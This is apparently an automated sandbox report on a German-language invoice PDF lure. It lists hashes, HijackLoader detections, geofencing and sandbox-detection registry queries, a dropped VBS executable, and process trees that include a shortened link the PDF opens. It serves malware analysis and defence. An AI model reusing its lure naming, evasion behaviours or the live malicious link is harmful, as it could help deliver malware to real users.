Analysis
-
max time kernel
96s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2024 05:59
Behavioral task
behavioral1
Sample
Rechnung0192839182.pdf
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Rechnung0192839182.pdf
Resource
win10v2004-20241007-en
General
-
Target
Rechnung0192839182.pdf
-
Size
88KB
-
MD5
b42da2c97afc62d51147fb36e96a648e
-
SHA1
ad631d0c4bef6b941bd61ff2860629e654a6c394
-
SHA256
bfd58f9f8557a8f8e8ddf4fad14a8588d1a529647c5aa170c0ed1bcf065fc287
-
SHA512
228db4bb8a54a80a19ac47744acb2bc70125bf73f5974b6cf45644544a1af1864a79a0648676904fd859956892c538e8d65d008cca3a8d9c58d6faa0a760a3fb
-
SSDEEP
1536:oFdBt4uc0o9uqdh+XICvr/HZ9QDUIWEtZgowq8sAsz+2Vb:cfnokwoIar/Htc+sAsz/b
Malware Config
Signatures
-
Detects HijackLoader (aka IDAT Loader) 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023c91-231.dat family_hijackloader behavioral2/files/0x0007000000023d3b-563.dat family_hijackloader behavioral2/files/0x0007000000023d42-577.dat family_hijackloader -
HijackLoader
HijackLoader is a multistage loader first seen in 2023.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3192 5428 cmd.exe 117 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 5876 Rechnung01920-10095043992995285637.vbs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rechnung01920-10095043992995285637.vbs.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ WScript.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 4768 msedge.exe 4768 msedge.exe 1700 msedge.exe 1700 msedge.exe 3256 identity_helper.exe 3256 identity_helper.exe 5300 msedge.exe 5300 msedge.exe 5876 Rechnung01920-10095043992995285637.vbs.exe 5876 Rechnung01920-10095043992995285637.vbs.exe 5876 Rechnung01920-10095043992995285637.vbs.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeRestorePrivilege 5852 7zG.exe Token: 35 5852 7zG.exe Token: SeSecurityPrivilege 5852 7zG.exe Token: SeSecurityPrivilege 5852 7zG.exe Token: SeDebugPrivilege 5876 Rechnung01920-10095043992995285637.vbs.exe -
Suspicious use of FindShellTrayWindow 44 IoCs
pid Process 2788 AcroRd32.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 5852 7zG.exe 1700 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe 1700 msedge.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe 2788 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2788 wrote to memory of 972 2788 AcroRd32.exe 85 PID 2788 wrote to memory of 972 2788 AcroRd32.exe 85 PID 2788 wrote to memory of 972 2788 AcroRd32.exe 85 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2732 972 RdrCEF.exe 86 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87 PID 972 wrote to memory of 2724 972 RdrCEF.exe 87
Processes
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Rechnung0192839182.pdf"1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140432⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CE360A6C50FDE7A131661C6B1F1DC70B --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- System Location Discovery: System Language Discovery
PID:2732
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=981237DA4138C5DE86CB4C5E13F0BC4E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=981237DA4138C5DE86CB4C5E13F0BC4E --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:13⤵
- System Location Discovery: System Language Discovery
PID:2724
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BB67D9A914C90C493B4D823F16624826 --mojo-platform-channel-handle=2272 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- System Location Discovery: System Language Discovery
PID:2304
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AAF4FDB387AD8A9EA1A68C7E3EDE27B1 --mojo-platform-channel-handle=1836 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- System Location Discovery: System Language Discovery
PID:4132
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=130B88366DD6461CB9DCFE21ADBDBBBC --mojo-platform-channel-handle=1724 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- System Location Discovery: System Language Discovery
PID:1484
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=EE2DB65041FE14997E104457215091FC --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=EE2DB65041FE14997E104457215091FC --renderer-client-id=7 --mojo-platform-channel-handle=1840 --allow-no-sandbox-job /prefetch:13⤵
- System Location Discovery: System Language Discovery
PID:4376
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.co/dZamaKLBX82⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1700 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff86d6146f8,0x7ff86d614708,0x7ff86d6147183⤵PID:4748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:23⤵PID:2192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:4768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:83⤵PID:1580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:13⤵PID:2840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:13⤵PID:876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:13⤵PID:2888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:13⤵PID:4316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:13⤵PID:4980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:13⤵PID:3336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:83⤵PID:1644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5080 /prefetch:83⤵PID:2232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:13⤵PID:1104
-
-
